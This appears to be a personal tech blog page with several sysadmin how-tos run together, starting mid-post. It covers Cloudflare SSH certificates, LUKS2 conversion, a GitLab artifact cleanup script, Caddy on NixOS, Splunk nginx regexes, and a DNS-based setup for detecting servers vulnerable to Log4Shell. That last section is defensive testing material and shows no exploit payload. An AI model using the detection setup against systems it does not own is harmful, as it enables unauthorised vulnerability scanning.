Navigate to Access → Service Auth → SSH tab. Select the application you just created and Generate certificate.
Copy the generated public key and save it to /etc/ssh/ca.pub
in your host (the host you’re going to SSH into).
sudo -e /etc/ssh/ca.pub
Navigate to Access → Tunnels
Install connector tab, choose the relevant OS and run the installation command. Once installed, you should see “connected” status.
Route tunnel tab,
After finishing creating a tunnel, you should have a new CNAME DNS record that points to tunnel-id.cfargotunnel.com. If there is no CNAME entry, grab the tunnel ID and create a new DNS record.
Install openssh-server
.
sudo -e /etc/ssh/sshd_config.d/cf.conf
TrustedUserCAKeys /etc/ssh/ca.pubListenAddress 127.0.0.1ListenAddress ::1PasswordAuthentication no# Uncomment below line for custom port# Port 1234
systemctl restart ssh
or systemctl restart sshd
The easiest setup is one where a Unix username matches the email that you configured to receive one-time PIN in previous steps. For example, if you set loremipsum@youremail.com, then create a new user loremipsum.
sudo adduser loremipsum
Set a random password and leave everything else blank.
To match loremipsum@youremail.com to lipsum user:
Match user lipsum AuthorizedPrincipalsCommand /bin/echo 'loremipsum' AuthorizedPrincipalsCommandUser nobody
loremipsum+somealias@youremail.com also works.
Match user lipsum AuthorizedPrincipalsCommand /bin/echo 'loremipsum+somealias' AuthorizedPrincipalsCommandUser nobody
For NixOS user, AuthorizedPrincipalsCommand
will not work because the command will run within “/nix/store” but it is read-only. Instead, you should use AuthorizedPrincipalsFile
. This config also enables you to match multiple emails to a username, just separate each email user by newline. This applies to all OpenSSH instances, not just NixOS.
echo 'loremipsum' | sudo tee /etc/ssh/authorized_principals
services.openssh = { enable = true; permitRootLogin = "no"; passwordAuthentication = false; # ports = [ 1234 ]; extraConfig = '' TrustedUserCAKeys /etc/ssh/ca.pub Match User lipsum AuthorizedPrincipalsFile /etc/ssh/authorized_principals # if there is no existing AuthenticationMethods AuthenticationMethods publickey ''; };```### Other use caseshttps://developers.cloudflare.com/cloudflare-one/identity/users/short-lived-certificates/#2-ensure-unix-usernames-match-user-sso-identities## Initiate SSH connectionInstall `cloudflared` on the host that you're going to SSH from.`cloudflared access ssh-config --hostname test.yourdomain.com --short-lived-cert`Example output:```plain ~/.ssh/configMatch host test.yourdomain.com exec "/usr/local/bin/cloudflared access ssh-gen --hostname %h" ProxyCommand /usr/local/bin/cloudflared access ssh --hostname %h IdentityFile ~/.cloudflared/%h-cf_key CertificateFile ~/.cloudflared/%h-cf_key-cert.pub
or
Host test.yourdomain.com ProxyCommand bash -c '/usr/local/bin/cloudflared access ssh-gen --hostname %h; ssh -tt %r@cfpipe-test.yourdomain.com >&2 <&1'Host cfpipe-test.yourdomain.com HostName test.yourdomain.com ProxyCommand /usr/local/bin/cloudflared access ssh --hostname %h IdentityFile ~/.cloudflared/test.yourdomain.com-cf_key CertificateFile ~/.cloudflared/test.yourdomain.com-cf_key-cert.pub
Save the output to $HOME/.ssh/config
.
Now, the moment of truth.
ssh loremipsum@test.yourdomain.com
(replace the username with the one you created in Create a test user step.)
The terminal should launch a website to team-name.cloudflareaccess.com. Enter the email you configured in Add an application step and then enter the received 6-digit PIN.
Back to the terminal, wait for at least 5 seconds and you should see the usual SSH authentication.
You may wondering why you still see fingerprint warning, I find this article SSH Best Practices using Certificates, 2FA and Bastions explains it well.
As a bonus, head to test.yourdomain.com (see Add an application step) which will redirect you to a login page just the previous step. After login with a 6-digit PIN, you shall see a browser-based shell.
Head to Settings → Account to monitor how many users you have, each email address you configured to receive one-time PIN is counted as one user.
To delete user(s), head to Users, tick the relevant users, Update status and then Remove. The seat usage column should show Inactive.
ssh-keygen -L -f ~/.cloudflared/test.yourdomain.com-cf_key-cert.pub
I ticked “Encrypt system” and Manjaro created two partitions in my NVMe drive without LVM. Btrfs subvolume can provide LVM-like functionality.
Partition | Filesystem | Mount | Encrypted |
---|---|---|---|
/dev/nvme0n1p1 | FAT32 | /boot/efi | No |
/dev/nvme0n1p2 | Btrfs | / | LUKS1 |
The implication of the above layout is that /boot
(where the kernel resides) is encrypted, except for /boot/efi
(Grub resides here)—p1 is not encrypted, p2 is LUKS-encrypted. So, Grub has to unlock the LUKS partition first (using password), before the rest of /
can be unlocked (using keyfile). Keyfile is used in this layout so that password is not prompted twice.
There are two disadvantages of using Grub to unlock LUKS:
Fortunately, there is an AUR package grub-improved-luks2-git that has been patched for Argon2 support. I will also show how to tune Argon2 parameters for faster unlock (while sacrificing security).
Use your favourite AUR helper to install grub-improved-luks2-git. This will take a while to compile patched Grub.
yay -S grub-improved-luks2-git
There should be a confirmation to remove grub
to avoid package conflict.
Reboot into live USB. Identify the location of encrypted location using GParted. The partition filesystem should be “[Encrypted] btrfs”. In my case, it is /dev/nvme0n1p2
.
sudo cryptsetup convert --type luks2 /dev/nvme0n1p2
If you want to revert back to LUKS1,
sudo cryptsetup convert --type luks1 /dev/nvme0n1p2
Before reverting back to LUKS1, the keyslot must be using PBKDF2 not Argon2, otherwise you will encounter “Cannot convert to LUKS1 format” error.
sudo cryptsetup luksConvertKey --pbkdf pbkdf2 /dev/nvme0n1p2
At this stage, the Grub bootloader (not the package) cannot unlock the LUKS2 partition yet. It needs to be reinstalled so that it can detect LUKS2 partition and load the relevant module.
First, unlock the partition and mount it.
sudo cryptsetup open /dev/nvme0n1p2 rootsudo mount -o subvol=@ /dev/mapper/root /mntsudo mount /dev/nvme0n1p1 /mnt/boot/efi
Notice in the “grub.cfg”, it loads luks
module instead of luks2
, this explains why Grub couldn’t unlock it.
$ sudo less /mnt/boot/grub/grub.cfgmenuentry 'Manjaro Linux' { insmod luks}
While you could manually update the config and replace luks
with luks2
, it is better to automate it using grub-mkconfig
.
sudo manjaro-chroot /mnt /bin/bash# or `sudo arch-chroot /mnt /bin/bash`grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=manjaro --recheckgrub-mkconfig -o /boot/grub/grub.cfg
Now, inspect “grub.cfg” again while still in chroot, you should see luks2
instead.
$ less /boot/grub/grub.cfgmenuentry 'Manjaro Linux' { insmod luks2}
Before proceed to the next step, I recommend reboot into your Manjaro/Arch to check whether Grub can unlock LUKS2. Once that is done, reboot again to live USB.
This step should be done in live USB
All keyslot parameters are retained during conversion to LUKS2, so the pbkdf algorithm is still PBKDF2 + SHA256. To convert to Argon2 + SHA512,
sudo cryptsetup luksConvertKey --pbkdf argon2id --hash sha512 /dev/nvme0n1p2
You may notice insmod gcry_sha256
line in the “grub.cfg”, this module is not used for LUKS2 unlocking, so there is no need to add insmod gcry_sha512
. As long as insmod luks2
is there, Grub should be able to unlock LUKS2 regardless of pbkdf or hash algorithm.
Still in live USB
sudo cryptsetup --allow-discards --perf-no_read_workqueue --perf-no_write_workqueue --persistent open /dev/nvme0n1p2 root
Verify the flags are set.
$ sudo cryptsetup luksDump /dev/nvme0n1p2 | grep FlagsFlags: allow-discards no-read-workqueue no-write-workqueue
More details:
This step can be done while the drive is mounted (as in not in live USB)
Due to lack of cryptography acceleration, Grub takes half a minute to unlock LUKS. For faster unlock, Argon2 parameters can be tuned to less security.
To start off, have a try with these parameters:
sudo cryptsetup luksConvertKey /dev/nvme0n1p2 --pbkdf-force-iterations 4 --pbkdf-memory 262100sudo cryptsetup luksConvertKey /dev/nvme0n1p2 --pbkdf-force-iterations 4 --pbkdf-memory 262100 --key-file /crypto_keyfile.bin
This page explains why keyfile also needs to be updated.
Reboot and check how fast is the unlock. Fine tune the --pbkdf-memory
option until the unlock speed is satisfactory (not too slow and not too fast). The option takes a value in kilobyte (KB).
MB | KB |
---|---|
128 | 131100 |
256 | 262100 |
512 | 524300 |
1024 | 1049000 |
In all my projects that were using more than 5 GB, 99% of the usage came from job artifacts. I believe most of the cases are like this. The first thing I did was to set new job artifacts to expire in a week, the default is 30 days. Existing job artifacts are not affected by this setting.
If your job artifacts created in a month are much less than 5 GB in total yet still exceed the quota, it is likely caused by very old artifacts which have no expiry. In that case, reducing the default expiry may not be relevant, those old artifacts should be removed instead.
build: artifacts: paths: - public/+ expire_in: 1 week
As for cleaning up existing job artifacts, I found the following bash script on the GitLab forum. I fixed some variable typo and modified the starting page to “2”, all job artifacts will be removed except for the first page, retaining 100 most recent job artifacts. The only dependencies are curl and jq.
This script is especially useful for removing job artifacts were created before 22 Jun 2020, artifacts created before that date do not expire.
#!/bin/bash# https://forum.gitlab.com/t/remove-all-artifact-no-expire-options/9274/12# Copyright 2021 "Holloway" Chew, Kean Ho <kean.ho.chew@zoralab.com># Copyright 2020 Benny Powers (https://forum.gitlab.com/u/bennyp/summary)# Copyright 2017 Adam Boseley (https://forum.gitlab.com/u/adam.boseley/summary)## Licensed under the Apache License, Version 2.0 (the "License");# you may not use this file except in compliance with the License.# You may obtain a copy of the License at## http://www.apache.org/licenses/LICENSE-2.0## Unless required by applicable law or agreed to in writing, software# distributed under the License is distributed on an "AS IS" BASIS,# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.# See the License for the specific language governing permissions and# limitations under the License.############### user input ################ project ID (Help: goto "Settings" > "General")projectID=""# user API token (Help: "User Settings" > "Access Tokens" > tick "api")token=""# gitlab server instanceserver="gitlab.com"# CI Jobs pagination (Help: "CI/CD" > "Jobs" > see bottom pagination bar)## NOTE: user interface might be bug. If so, you need to manually calculate.# By default, maximum 10,000 (end_page * per_page) job artifacts will be removed, while retaining 100 most recent artifacts.# Example:# 1. For 123 jobs in the past and per_page is "100" (maximum), it has 2 pages (end_page) in total# [end_page = ROUND_UP(total_job / per_page)].# 2. To retain most recent 200 jobs# [start_page = num_job_retain / per_page + 1]start_page="2"end_page="100"per_page="100"# GitLab API versionapi="v4"###################### internal function ######################delete() { # page page="$1" 1>&2 printf "Cleaning page ${page}...\n" # build internal variables baseURL="https://${server}/api/${api}/projects" # get list from servers for the page url="${baseURL}/${projectID}/jobs/?page=${page}&per_page=${per_page}" 1>&2 printf "Calling API to get lob list: ${url}\n" list=$(curl --globoff --header "PRIVATE-TOKEN:${token}" "$url" \ | jq -r ".[].id") if [ ${#list[@]} -eq 0 ]; then 1>&2 printf "list is empty\n" return 0 fi # remove all jobs from page for jobID in ${list[@]}; do url="${baseURL}/${projectID}/jobs/${jobID}/erase" 1>&2 printf "Calling API to erase job: ${url}\n" curl --request POST --header "PRIVATE-TOKEN:${token}" "$url" 1>&2 printf "\n\n" done}main() { # check dependencies if [ -z $(type -p jq) ]; then 1>&2 printf "[ ERROR ] need 'jq' dependency to parse json." exit 1 fi # loop through each pages from given start_page to end_page inclusive for ((i=start_page; i<=end_page; i++)); do delete $i done # return exit 0}main $@
Project | Before | After | Runtime |
---|---|---|---|
malware-filter (project) | 15.12 GB | 6.3 GB | 46m 15s |
phishing-filter | 6.02 GB | 949 MB | 1h 35m 17s |
pup-filter | 1.16 GB | 480.4 MB | 57m 45s |
tracking-filter | 106.68 MB | 105.3 MB | 4m 38s |
urlhaus-filter | 2.64 GB | 908 MB | 1h 50m 19s |
vn-badsite-filter | 283.12 MB | 114.8 MB | 19m 52s |
Previous method no longer works on 22.11. Refer to xcaddy section instead.
Caddy, like any other web servers, is extensible through plugins. Plugin is usually installed using xcaddy; using it is as easy as $ xcaddy build --with github.com/caddyserver/ntlm-transport
to build the latest caddy binary with ntlm-transport plugin.
NixOS has its own way of building Go package (Caddy is written in Go), so using xcaddy may be counterintuitive. The Nix-way to go is to build a custom package using a “*.nix” file and instruct the service (also known as a module in Nix ecosystem) to use that package instead of the repo’s.
In NixOS, the Caddy module has long included services.caddy.package
option to specify custom package. It was primarily used as a way to install Caddy 2 from the unstable channel (unstable.caddy
) because the package in stable channel (pkgs.caddy
) of NixOS 20.03 is still Caddy 1. I talked about that option in a previous post.
Aside from installing Caddy from different channel, that option can also be used to specify a custom package by using pkgs.callPackage
. I previously used callPackage
as a workaround to install cloudflared in an IPv6-only instance from a repository other than GitHub because GitHub doesn’t support IPv6 yet.
If a custom package is defined in “/etc/caddy/custom-package.nix”, then the configuration will be:
services.caddy = { enable = true; package = pkgs.callPackage /etc/caddy/custom-package.nix { };};
The following package patches the “main.go“ file of the upstream source to insert additional plugins. The code snippet is courtesy of @diamondburned. The marked lines show how plugins are specified through the plugins
option.
{ lib, buildGoModule, fetchFromGitHub, plugins ? [], vendorSha256 ? "" }:with lib;let imports = flip concatMapStrings plugins (pkg: "\t\t\t_ \"${pkg}\"\n"); main = '' package main import ( caddycmd "github.com/caddyserver/caddy/v2/cmd" _ "github.com/caddyserver/caddy/v2/modules/standard"${imports} ) func main() { caddycmd.Main() } '';in buildGoModule rec { pname = "caddy"; version = "2.4.6"; subPackages = [ "cmd/caddy" ]; src = fetchFromGitHub { owner = "caddyserver"; repo = pname; # https://github.com/NixOS/nixpkgs/blob/nixos-21.11/pkgs/servers/caddy/default.nix rev = "v${version}"; sha256 = "sha256-xNCxzoNpXkj8WF9+kYJfO18ux8/OhxygkGjA49+Q4vY="; }; inherit vendorSha256; overrideModAttrs = (_: { preBuild = "echo '${main}' > cmd/caddy/main.go"; postInstall = "cp go.sum go.mod $out/ && ls $out/"; }); postPatch = '' echo '${main}' > cmd/caddy/main.go cat cmd/caddy/main.go ''; postConfigure = '' cp vendor/go.sum ./ cp vendor/go.mod ./ ''; meta = with lib; { homepage = https://caddyserver.com; description = "Fast, cross-platform HTTP/2 web server with automatic HTTPS"; license = licenses.asl20; maintainers = with maintainers; [ rushmorem fpletz zimbatm ]; };}
Specify the desired plugins in services.caddy.package.plugins
:
services.caddy = { enable = true; package = (pkgs.callPackage /etc/caddy/custom-package.nix { plugins = [ "github.com/caddyserver/ntlm-transport" "github.com/caddyserver/forwardproxy" ]; vendorSha256 = "0000000000000000000000000000000000000000000000000000"; });};
The above example will install ntlm-transport and forwardproxy plugins. The first run of nixos-rebuild
will fail due to mismatched vendorSha256
, simply replace the “000…” with the expected value and the second run should be ok.
Since the Nix-way of building custom caddy plugins no longer works in 22.11, I resort to the caddy-way instead, by using xcaddy. The implication of using xcaddy is that Nix sandbox can no longer be enabled because the sandbox does not even allow network access. Nix sandbox is enabled by default in NixOS, to disable:
nix.settings.sandbox = false;
Then run sudo nixos-rebuild switch
to apply the config. Verify the generated config in /etc/nix/nix.conf
.
Nix sandbox is not a security feature, rather it is used to provide reproducibility, its fundamental feature. When enabled, each build will run in an isolated environment not affected by the system configuration. This feature is essential when contributing to Nixpkgs to ensure that a successful build does not depend on the contributor’s system configuration. For example, all dependencies should be declared even when the contributor’s system already installed all or some beforehand; a build will fail if there is any undeclared dependency.
The following package will always use the latest
caddy release.
{ pkgs, config, plugins, ... }:with pkgs;stdenv.mkDerivation rec { pname = "caddy"; # https://github.com/NixOS/nixpkgs/issues/113520 version = "latest"; dontUnpack = true; nativeBuildInputs = [ git go xcaddy ]; configurePhase = '' export GOCACHE=$TMPDIR/go-cache export GOPATH="$TMPDIR/go" ''; buildPhase = let pluginArgs = lib.concatMapStringsSep " " (plugin: "--with ${plugin}") plugins; in '' runHook preBuild ${xcaddy}/bin/xcaddy build latest ${pluginArgs} runHook postBuild ''; installPhase = '' runHook preInstall mkdir -p $out/bin mv caddy $out/bin runHook postInstall '';}
If you prefer to specify a version, modify the following lines:
# line 7version = "2.6.4";# line 12${xcaddy}/bin/xcaddy build "v${version}" ${pluginArgs}
To install the above package, use the same config shown in the Install custom package but remove the vendorSha256
line. Remember to nixos-rebuild
again.
To illustrate, say we have a log format like this:
{id} "{http.request.host}" "{http.request.header.user-agent}"
An example log is:
123 "example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
While you could search for a specific keyword, e.g. attempts of Log4shell exploit, since there are no fields, you cannot run any statistics like table
or stats
on the search results.
Splunk is able to understand Apache log format because its field extractor already includes the necessary regex patterns to parse the relevant fields of each line in a log. Choosing a source type is equivalent of choosing a log format. If a format is not listed in the default list, we can either use an add-on or create new fields using field extractor. There is a Splunk add-on for nginx and I suggest to try it before resorting to field extractor.
I create five patterns which cover most of the nginx events I encountered during my work. Refer to the documentation for supported syntax.
A field is extracted through “capturing group”.
(?<field_name>capture pattern)
For example, (?<month>\w+)
searches for one or more (+
) alphanumeric characters (\w
) and names the field as month
. I opted for lazier matching, mostly using unbounded quantifier +
instead of a stricter range of occurrences {M,N}
despite knowing the exact pattern of a field. I found some fields may stray off slightly from the expected pattern, so a lazier matching tends match more events without matching unwanted’s.
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<remote_ip>[\d\.]+)(?:\s\d+\s\S+\s\S+\s)\[(?<time_local>\S+)\s(?<timezone>\+\d{4})\]\s"(?<http_method>\w+)\s(?<http_path>.+)\s(?<http_version>HTTP/\d\.\d)"\s(?<http_status>\d{3})\s(?:\d+)\s"(?<request_url>.[^"]*)"\s"(?<http_user_agent>.[^"]*)"\s(?<server_ip>[\d\.]+)\:(?<server_port>\d+)(?:\s\d+\s\d+\s)(?<ssl_version>\S+)\s(?<ssl_cipher>\S+)\s(?<http_cookie>\S+)
Dec 24 01:23:45 192.168.0.2 nginx: 1.2.3.4 55763 - - [24/Dec/2021:01:23:45 +0000] "GET /page.html HTTP/2.0" 200 494 "https://www.example.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 192.168.1.2:8080 123 4 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 abcdef .
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | One or more alphanumeric |
day | 24 | (?<day>\d+) | One or more digit |
time | 01:23:45 | (?<time>[\d\:]+) | One or more digit or semicolon |
proxy_ip | 192.168.0.2 | (?<proxy_ip>[\d\.]+) | One or more digit or dot |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
time_local | 24/Dec/2021:01:23:45 | (?<time_local>\S+) | One or more non-whitespace characters |
timezone | +0000 | (?<timezone>[\+\-]\d{4}) | Four digits with plus or minus prefix |
http_method | GET | (?<http_method>\w+) | |
http_path | /page.html | (?<http_path>.+) | One or more of any character |
http_version | HTTP/2.0 | (?<http_version>HTTP/\d\.\d) | “HTTP”, a digit, dot and digit |
http_status | 200 | (?<http_status>\d{3}) | Three digits |
request_url | https://www.example.com | (?<request_url>.[^"]*) | Zero or more of any character except double quote |
http_user_agent | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | (?<http_user_agent>.[^"]*) | |
server_ip | 192.168.1.2 | (?<server_ip>[\d\.]+) | |
server_port | 8080 | (?<server_port>\d+) | |
ssl_version | TLSv1.2 | (?<ssl_version>\S+) | |
ssl_cipher | ECDHE-RSA-AES128-GCM-SHA256 | (?<ssl_cipher>\S+) | |
http_cookie | abcdef | (?<http_cookie>\S+) |
nginx is configured as a reverse proxy, proxy_ip
is its ip whereas server_ip
is the upstream’s.
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\sclient\s)(?<remote_ip>[\d\.]+)\:(?<remote_port>\d+)(?:\sconnected\sto\s)(?<server_ip>[\d\.]+)\:(?<server_port>\d+)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 1776#1776:*114333142 client 1.2.3.4:19802 connected to 192.168.1.2:8080
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<proxy_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | info | (?<log_level>\w+) | |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
remote_port | 19802 | (?<remote_port>\d+) | |
server_ip | 192.168.1.2 | (?<server_ip>[\d\.]+) | |
server_port | 8080 | (?<server_port>\d+) |
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?<upstream_error>.[^,]*)(?:,\sclient\:\s)(?<remote_ip>[\d\.]+)(?:,\sserver\:\s)(?<server_host>.[^,]*)(?:,\srequest\:\s")(?<http_method>\w+)\s(?<http_path>\S+)\s(?<http_version>HTTP/\d\.\d)(?:",\supstream\:\s")(?<upstream_url>.[^"]*)",\shost\:\s"(?<upstream_host>.[^"]*)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [error] 1776#1776:*71197740 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 1.2.3.4, server: example.com, request: "POST /api/path HTTP/2.0",upstream: "http://192.168.1.2:8080/api/path", host:"example.com"
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<remote_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | error | (?<log_level>\w+) | |
upstream_error | upstream timed out (110: Connection timed out) while reading response header from upstream | (?<upstream_error>.[^,]*) | Zero or more of any character except comma |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
server_host | example.com | (?<server_host>.[^,]*) | |
http_method | POST | (?<http_method>\w+) | |
http_path | /api/path | (?<http_path>\S+) | |
http_version | HTTP/2.0 | (?<http_version>HTTP/\d\.\d) | |
upstream_url | http://192.168.1.2:8080/api/path | (?<upstream_url>.[^"]*) | |
upstream_host | example.com | (?<upstream_host>.[^"]*) |
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?<upstream_error>[^,]*,[^,]*)(?:,\sclient\:\s)(?<remote_ip>[\d\.]+)(?:,\sserver\:\s)(?<server_host>.[^,]*)(?:,\srequest\:\s")(?<http_method>\w+)\s(?<http_path>\S+)\s(?<http_version>HTTP/\d\.\d)(?:",\supstream\:\s")(?<upstream_url>.[^"]*)(?:",\shost\:\s")(?<upstream_host>.[^"]*)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 13199#13199: *81574833 epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while connecting to upstream, client: 1.2.3.4, server: example.com, request: "GET /page.html HTTP/1.1", upstream:"http://192.168.1.2/page.html", host: "example.com"
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<remote_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | info | (?<log_level>\w+) | |
upstream_error | epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while connecting to upstream | (?<upstream_error>.[^,]*) | |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
server_host | example.com | (?<server_host>.[^,]*) | |
http_method | GET | (?<http_method>\w+) | |
http_path | /page.html | (?<http_path>\S+) | |
http_version | HTTP/1.1 | (?<http_version>HTTP/\d\.\d) | |
upstream_url | http://192.168.1.2/page.html | (?<upstream_url>.[^"]*) | |
upstream_host | example.com | (?<upstream_host>.[^"]*) |
(?<month>\w+)\s+(?<day>\d+)\s(?<time>[\d\:]+)\s(?<proxy_ip>[\d\.]+)(?:\snginx\:\s)(?<year>\d{4})\/(?<nmonth>\d{2})(?:\/\d{2}\s[\d\:]+\s)\[(?<log_level>\w+)\](?:\s\d+#\d+\:\s\*\d+\s)(?<upstream_error>[^,]*,[^,]*)(?:,\sclient\:\s)(?<remote_ip>[\d\.]+)(?:,\sserver\:\s)(?<server_host>.[^,]*)(?:,\srequest\:\s")(?<http_method>\w+)\s(?<http_path>\S+)\s(?<http_version>HTTP/\d\.\d)(?:",\supstream\:\s")(?<upstream_url>.[^"]*)(?:",\shost\:\s")(?<upstream_host>.[^"]*)(?:",\sreferrer\:\s")(?<referrer>.[^"]*)
Dec 24 01:23:45 192.168.0.2 nginx: 2021/12/24 01:23:45 [info] 1776#1776:*71220252 epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream, client: 1.2.3.4, server: example.com, request: "GET /page.html HTTP/1.1", upstream: "http://192.168.1.2:8080/page.html", host: "example.com", referrer: "https://example.com"
Field | Value | Regex | Explanation |
---|---|---|---|
month | Dec | (?<month>\w+) | |
day | 24 | (?<day>\d+) | |
time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<remote_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | info | (?<log_level>\w+) | |
upstream_error | epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream | (?<upstream_error>.[^,]*) | |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
server_host | example.com | (?<server_host>.[^,]*) | |
http_method | GET | (?<http_method>\w+) | |
http_path | /page.html | (?<http_path>\S+) | |
http_version | HTTP/1.1 | (?<http_version>HTTP/\d\.\d) | |
upstream_url | http://192.168.1.2:8080/page.html | (?<upstream_url>.[^"]*) | |
upstream_host | example.com | (?<upstream_host>.[^"]*) | |
referrer | https://example.com | (?<referrer>.[^"]*) |
(Edit: 12 Feb 2022) AWS CDK stack is available at curben/aws-scripts
Most of the publications discussing the Log4Shell/Log4j vulnerability ([1], [2], [3], [4]) focus on the ability to instruct the JNDI component to load remote code or download payload using LDAP. A less known fact is that Log4j also supports DNS protocol by default, at least in versions prior to 2.15.0.
Huntress, a cyber security company, created an easy-to-use tool at log4shell.huntress.com to detect whether your server is vulnerable using LDAP. Despite the assurance of transparency by the availability of source code so you could host it yourself, there’s no denying the fact that log4shell.huntress.com is a third-party service; even if anyone could host it, not everyone has the ability to audit the source code. Another third-party service that is mentioned around is dnslog.cn which detects (as the name implies) using DNS protocol.
Since the DNS request made by Log4j is just a simple DNS lookup—similar to a web browser’s request—we can run any kind of DNS server: authoritative or recursive. Recursive DNS server is the easier option because it simply forwards request to upstream authoritative server(s). If a server is vulnerable, we’ll see its IP address in the DNS server’s query logs when we attempt the exploit.
Unbound is a popular DNS server due to its simplicity. dnsmasq is another option, it was the default dns caching in Ubuntu before being replaced by systemd-resolved.
When installing a server (web, DNS, app, etc), Ubuntu usually starts the service immediately after installation. I prefer to properly configure a server before starting it, so I’m going to mask it first to prevent that auto-start.
Except for checking service status, log and dns query, all commands require
sudo
privilege.
systemctl mask unbound
Above command may fail in a script, in that case, use ln -s /dev/null /etc/systemd/system/unbound.service
instead.
Then, we can proceed to install and configure it.
apt updateapt install unboundsudo -e /etc/unbound/unbound.conf.d/custom.conf
sudo -e
is preferred over sudo nano
for security reason.
Paste the following config.
# Based on https://www.linuxbabe.com/ubuntu/set-up-unbound-dns-resolver-on-ubuntu-20-04-serverserver: # the working directory. directory: "/etc/unbound" # run as the unbound user username: unbound # uncomment and increase to get more logging # verbosity: 2 # log dns queries log-queries: yes # listen on all interfaces, interface: 0.0.0.0 # comment out to support IPv6. # interface: ::0 # answer queries from the local network only, change to your private IP # interface: 192.168.0.2 # perform prefetching of almost expired DNS cache entries. prefetch: yes # respond to all IP access-control: 0.0.0.0/0 allow # IPv6 # access-control: ::0/0 allow # respond to local network only, change the CIDR according to your network # access-control: 192.168.88.0/24 allow # localhost only # access-control: 127.0.0.1/24 allow # hide server info from clients hide-identity: yes hide-version: yesremote-control: # Disable unbound-control control-enable: noforward-zone: # Forward all queries to Quad9, use your favourite DNS name: "." forward-addr: 9.9.9.9 forward-addr: 149.112.112.112
Ctrl + X to quit, Y to save, Enter to confirm.
With the above config, Unbound will respond to all IP, including public IP if exposed to internet.
Since Unbound will listen on all interfaces, it’ll interfere with systemd-resolved which listens on 127.0.0.53:53 by default. So, before we start Unbound, systemd-resolved needs to be disabled first.
systemctl disable --now systemd-resolved
We also need to add the server’s hostname to /etc/hosts
, otherwise sudo
will take a long time to execute. If you’re using AWS EC2, the hostname will be “ip-a-b-c-d“ where abcd is the private IP.
sudo -e /etc/hosts# append this line127.0.0.1 ip-a-b-c-d
The last step before we start the service is to configure the firewall to allow inbound DNS traffic. I recommend not to allow all IP (0.0.0.0, ::0), otherwise you’ll get unwanted traffic. In EC2, that means the attached security group.
After we configure the firewall, we can proceed to unmask and start the DNS server.
systemctl unmask unboundsystemctl enable --now unbound
To see whether it’s working, execute some queries:
# localhostdig example.com @127.0.0.1# other machine, same subnetdig example.com @192.168.0.x# other machine over internetdig example.com @public-ip
Verify Unbound is logging queries,
journalctl -xe -u unbound# Dec 14 01:23:45 ip-a-b-c-d unbound[pid]: [pid:0] info: 127.0.0.1 example.com. A IN
We are now ready to test Log4shell vulnerability.
This is an optional step to demonstrate Log4shell.
A demo vulnerable is available as a Docker image at christophetd/log4shell-vulnerable-app. For best security practice, I recommend:
After building the image and just before you run it, configure the relevant firewall to restrict outbound connection to the Unbound DNS server only. If you prefer to use port 80 for the app server, run docker run -p 80:8080 --name vulnerable-app vulnerable-app
. Open inbound port 8080 (or port 80) in the firewall.
To test the app server is reachable, send a test request.
